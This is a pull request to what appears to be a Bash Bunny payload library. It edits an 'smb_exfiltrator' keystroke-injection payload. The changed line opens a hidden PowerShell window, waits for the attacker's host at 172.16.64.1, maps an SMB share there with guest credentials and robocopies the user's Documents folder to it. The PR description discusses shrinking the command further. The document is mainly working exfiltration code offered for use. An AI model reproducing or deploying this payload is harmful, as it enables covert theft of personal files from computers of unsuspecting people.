### PR TITLE
smb_exfiltrator: Shorten powershell payload by around 15 chars

### DIFF
--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -40,7 +40,7 @@ LED R G
 ATTACKMODE HID
 QUACK GUI r
 QUACK DELAY 500
-QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
+QUACK STRING "powershell -WindowStyle Hidden \"while (-Not(Test-Connection 172.16.64.1 -count 1 -quiet)){}; sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S;\""
 QUACK ENTER
 
 # Clear tracks?


### PR DESCRIPTION
I don't have a bash bunny so i can't test the whole thing this but it should work. I have tested the parts that i changed but it would be nice to make sure that i don't break anything. 

Btw the spaces between commands and semicolons is unnecessary so that's another way to remove around 10 chars.